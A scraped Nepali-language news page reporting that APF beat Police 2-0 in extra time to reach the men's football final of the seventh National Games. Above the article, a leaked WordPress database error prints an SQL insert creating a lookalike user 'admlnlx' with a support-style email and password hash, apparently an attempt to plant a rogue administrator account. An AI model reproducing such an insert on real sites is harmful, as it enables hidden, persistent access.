WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ7fhXkdbNF5iNekv6ExAmrLcLvhpU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:24:00', '', 'admlnlx', 'admlnlx')
इटहरी,पुस १३ –
सातौं राष्ट्रिय खेलकुद प्रतियोगिता अन्तर्गत सशस्त्र प्रहरी पुरुष फुटबलको फाइनलमा प्रवेश गरेको छ। सुनसरी धरानको एन्फा टेक्निकल सेन्टरमा भएको पहिलो सेमिफाइनल खेलमा एपीएफले पुलिसलाई २-० ले हराएको हो। निर्धारित ९० मिनेटमा गोल हुन नसकेपछि थपिएको समयमा एपीएफले दुई गोल हानेर विजयी भएको हो। एपीएफका लागि युवराज खड्काले १०० औं मिनेटमा र नवीन लामा खेल सकिन १ मिनेट बाँकी हुँदा गोल हानेका हुन्। एपीएफले उपाधिका लागि बुधबार नै हुने आर्मी र मध्यमाञ्चलबीचको खेलको विजेतासँग पुस १५ गते खेल्नेछ।